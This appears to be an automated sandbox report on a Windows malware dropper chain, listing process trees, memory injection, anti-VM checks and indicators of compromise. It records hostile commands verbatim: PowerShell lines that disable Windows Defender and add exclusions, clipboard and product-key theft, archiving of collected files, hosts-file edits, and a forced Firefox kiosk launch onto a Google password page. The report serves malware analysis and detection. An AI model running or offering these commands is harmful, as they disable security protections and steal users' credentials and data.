2772	b8535da000.exe
2772	b8535da000.exe
2772	b8535da000.exe
2772	b8535da000.exe
2772	b8535da000.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
2772	b8535da000.exe
2772	b8535da000.exe
2772	b8535da000.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4992	firefox.exe
1252	9feskIx.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4932 wrote to memory of 4000	4932	74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51.exe	82
PID 4932 wrote to memory of 4000	4932	74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51.exe	82
PID 4932 wrote to memory of 4000	4932	74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51.exe	82
PID 4000 wrote to memory of 3520	4000	U0w71.exe	83
PID 4000 wrote to memory of 3520	4000	U0w71.exe	83
PID 4000 wrote to memory of 3520	4000	U0w71.exe	83
PID 3520 wrote to memory of 1004	3520	W5n58.exe	84
PID 3520 wrote to memory of 1004	3520	W5n58.exe	84
PID 3520 wrote to memory of 1004	3520	W5n58.exe	84
PID 1004 wrote to memory of 4900	1004	1J17p1.exe	85
PID 1004 wrote to memory of 4900	1004	1J17p1.exe	85
PID 1004 wrote to memory of 4900	1004	1J17p1.exe	85
PID 3520 wrote to memory of 1968	3520	W5n58.exe	86
PID 3520 wrote to memory of 1968	3520	W5n58.exe	86
PID 3520 wrote to memory of 1968	3520	W5n58.exe	86
PID 4000 wrote to memory of 2308	4000	U0w71.exe	87
PID 4000 wrote to memory of 2308	4000	U0w71.exe	87
PID 4000 wrote to memory of 2308	4000	U0w71.exe	87
PID 4932 wrote to memory of 2116	4932	74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51.exe	90
PID 4932 wrote to memory of 2116	4932	74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51.exe	90
PID 4932 wrote to memory of 2116	4932	74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51.exe	90
PID 4900 wrote to memory of 1252	4900	skotes.exe	91
PID 4900 wrote to memory of 1252	4900	skotes.exe	91
PID 4900 wrote to memory of 1252	4900	skotes.exe	91
PID 4900 wrote to memory of 4200	4900	skotes.exe	95
PID 4900 wrote to memory of 4200	4900	skotes.exe	95
PID 4900 wrote to memory of 4200	4900	skotes.exe	95
PID 4900 wrote to memory of 640	4900	skotes.exe	98
PID 4900 wrote to memory of 640	4900	skotes.exe	98
PID 4900 wrote to memory of 640	4900	skotes.exe	98
PID 4900 wrote to memory of 516	4900	skotes.exe	100
PID 4900 wrote to memory of 516	4900	skotes.exe	100
PID 4900 wrote to memory of 516	4900	skotes.exe	100
PID 4900 wrote to memory of 2772	4900	skotes.exe	101
PID 4900 wrote to memory of 2772	4900	skotes.exe	101
PID 4900 wrote to memory of 2772	4900	skotes.exe	101
PID 2772 wrote to memory of 1160	2772	b8535da000.exe	102
PID 2772 wrote to memory of 1160	2772	b8535da000.exe	102
PID 2772 wrote to memory of 1160	2772	b8535da000.exe	102
PID 2772 wrote to memory of 3028	2772	b8535da000.exe	104
PID 2772 wrote to memory of 3028	2772	b8535da000.exe	104
PID 2772 wrote to memory of 3028	2772	b8535da000.exe	104
PID 2772 wrote to memory of 2896	2772	b8535da000.exe	106
PID 2772 wrote to memory of 2896	2772	b8535da000.exe	106
PID 2772 wrote to memory of 2896	2772	b8535da000.exe	106
PID 2772 wrote to memory of 4784	2772	b8535da000.exe	108
PID 2772 wrote to memory of 4784	2772	b8535da000.exe	108
PID 2772 wrote to memory of 4784	2772	b8535da000.exe	108
PID 2772 wrote to memory of 2228	2772	b8535da000.exe	110
PID 2772 wrote to memory of 2228	2772	b8535da000.exe	110
PID 2772 wrote to memory of 2228	2772	b8535da000.exe	110
PID 4900 wrote to memory of 1648	4900	skotes.exe	112
PID 4900 wrote to memory of 1648	4900	skotes.exe	112
PID 4900 wrote to memory of 1648	4900	skotes.exe	112
PID 2772 wrote to memory of 4032	2772	b8535da000.exe	113
PID 2772 wrote to memory of 4032	2772	b8535da000.exe	113
PID 4032 wrote to memory of 4992	4032	firefox.exe	114
PID 4032 wrote to memory of 4992	4032	firefox.exe	114
PID 4032 wrote to memory of 4992	4032	firefox.exe	114
PID 4032 wrote to memory of 4992	4032	firefox.exe	114
PID 4032 wrote to memory of 4992	4032	firefox.exe	114
PID 4032 wrote to memory of 4992	4032	firefox.exe	114
PID 4032 wrote to memory of 4992	4032	firefox.exe	114
PID 4032 wrote to memory of 4992	4032	firefox.exe	114

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

Hidden Files and Directories

T1564.001

pid	Process
5096	attrib.exe
5176	attrib.exe

C:\Users\Admin\AppData\Local\Temp\74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51.exe
"C:\Users\Admin\AppData\Local\Temp\74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4932
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\U0w71.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\U0w71.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4000
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\W5n58.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\W5n58.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3520
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1J17p1.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1J17p1.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:1004
    - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4900
      - C:\Users\Admin\AppData\Local\Temp\1013829001\9feskIx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013829001\9feskIx.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1252
        
        C:\Users\Admin\AppData\Local\Temp\dasald.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dasald.exe"
        7⤵
        Executes dropped EXE
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\dasald.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dasald.exe"
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dasald.exe'"
        9⤵
        
        PID:7036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dasald.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        9⤵
        
        PID:5892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        9⤵
        
        PID:6160
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        10⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        9⤵
        
        PID:6312
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        10⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5796
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        9⤵
        
        PID:6524
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        9⤵
        Clipboard Data
        
        PID:6556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        9⤵
        
        PID:6496
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        10⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        9⤵
        
        PID:6520
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        10⤵
        
        PID:5864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        9⤵
        
        PID:5704
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        10⤵
        Gathers system information
        
        PID:6944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        9⤵
        
        PID:5412
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        10⤵
        
        PID:7136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        9⤵
        
        PID:4520
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        10⤵
        
        PID:1828
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        9⤵
        
        PID:1356
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        10⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        9⤵
        
        PID:3172
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        10⤵
        
        PID:5144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        9⤵
        
        PID:1608
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        10⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        9⤵
        
        PID:1800
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        10⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        9⤵
        
        PID:732
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        10⤵
        
        PID:5160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        9⤵
        
        PID:5352
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        10⤵
        
        PID:5312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        9⤵
        
        PID:5580
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        10⤵
        
        PID:5660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4992"
        9⤵
        
        PID:5692
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4992
        10⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2848"
        9⤵
        
        PID:5548
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2848
        10⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3372"
        9⤵
        
        PID:5288
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3372
        10⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4604"
        9⤵
        
        PID:6068
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4604
        10⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2720"
        9⤵
        
        PID:6224
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2720
        10⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6488"
        9⤵
        
        PID:6000
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 6488
        10⤵
        Kills process with taskkill
        
        PID:1648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 7012"
        9⤵
        
        PID:4888
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 7012
        10⤵
        Kills process with taskkill
        
        PID:4488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 7024"
        9⤵
        
        PID:1480
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 7024
        10⤵
        Kills process with taskkill
        
        PID:5252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 7052"
        9⤵
        
        PID:5184
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 7052
        10⤵
        Kills process with taskkill
        
        PID:6236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        9⤵
        
        PID:3140
        
        C:\Windows\system32\getmac.exe
        
        getmac
        10⤵
        
        PID:6388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI39282\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\ezUJX.zip" *"
        9⤵
        
        PID:6516
        
        C:\Users\Admin\AppData\Local\Temp\_MEI39282\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI39282\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\ezUJX.zip" *
        10⤵
        Executes dropped EXE
        
        PID:6112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        9⤵
        
        PID:6964
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        10⤵
        
        PID:7164
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        9⤵
        
        PID:6436
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        10⤵
        
        PID:6664
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        9⤵
        
        PID:5808
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        10⤵
        
        PID:6976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        9⤵
        
        PID:3260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1604
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        9⤵
        
        PID:5072
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        10⤵
        Detects videocard installed
        
        PID:7112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        9⤵
        
        PID:3640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6380
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 2096
        7⤵
        Program crash
        
        PID:5960
      - C:\Users\Admin\AppData\Local\Temp\1013846001\694a6d94db.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013846001\694a6d94db.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4200
      - C:\Users\Admin\AppData\Local\Temp\1013847001\c0641774b2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013847001\c0641774b2.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        System Location Discovery: System Language Discovery
        
        PID:640
      - C:\Users\Admin\AppData\Local\Temp\1013848001\f65883a956.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013848001\f65883a956.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:516
      - C:\Users\Admin\AppData\Local\Temp\1013849001\b8535da000.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013849001\b8535da000.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:2772
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1160
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3028
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2896
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4784
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2228
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4032
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4992
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2036 -parentBuildID 20240401114208 -prefsHandle 1952 -prefMapHandle 1944 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a770e456-1325-4f76-9cef-3b6d1612160a} 4992 "\\.\pipe\gecko-crash-server-pipe.4992" gpu
        9⤵
        
        PID:2848
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2500 -parentBuildID 20240401114208 -prefsHandle 2484 -prefMapHandle 2480 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {53090baa-ac8f-4122-824d-a64a9f5b2dc4} 4992 "\\.\pipe\gecko-crash-server-pipe.4992" socket
        9⤵
        
        PID:3372
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=892 -childID 1 -isForBrowser -prefsHandle 3336 -prefMapHandle 3364 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {308e29d6-b486-4d72-aa1a-2ac19ea354ed} 4992 "\\.\pipe\gecko-crash-server-pipe.4992" tab
        9⤵
        
        PID:4604
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4112 -childID 2 -isForBrowser -prefsHandle 4104 -prefMapHandle 4100 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8628b1b6-2d21-48dc-83ca-3effbc6e6ab7} 4992 "\\.\pipe\gecko-crash-server-pipe.4992" tab
        9⤵
        
        PID:2720
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4760 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4716 -prefMapHandle 4712 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {57ecd50e-d3df-4abc-b085-cafe4f05b9e7} 4992 "\\.\pipe\gecko-crash-server-pipe.4992" utility
        9⤵
        Checks processor information in registry
        
        PID:6488
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5180 -childID 3 -isForBrowser -prefsHandle 5172 -prefMapHandle 5168 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {630f588a-1d15-480b-9b0d-1b21b9db5e18} 4992 "\\.\pipe\gecko-crash-server-pipe.4992" tab
        9⤵
        
        PID:7012
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5296 -childID 4 -isForBrowser -prefsHandle 5304 -prefMapHandle 5308 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {023cf2df-0022-438a-bc26-d2d48555e723} 4992 "\\.\pipe\gecko-crash-server-pipe.4992" tab
        9⤵
        
        PID:7024
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5504 -childID 5 -isForBrowser -prefsHandle 5512 -prefMapHandle 5520 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f79c516e-43bd-40fe-8d67-f2d039b41b32} 4992 "\\.\pipe\gecko-crash-server-pipe.4992" tab
        9⤵
        
        PID:7052
      - C:\Users\Admin\AppData\Local\Temp\1013850001\30b3e46c44.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013850001\30b3e46c44.exe"
        6⤵
        Modifies Windows Defender Real-time Protection settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1648
      - C:\Users\Admin\AppData\Local\Temp\1013851001\0ada70c7c7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013851001\0ada70c7c7.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5380
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1528
        7⤵
        Program crash
        
        PID:468
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2J9156.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2J9156.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3y47J.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3y47J.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
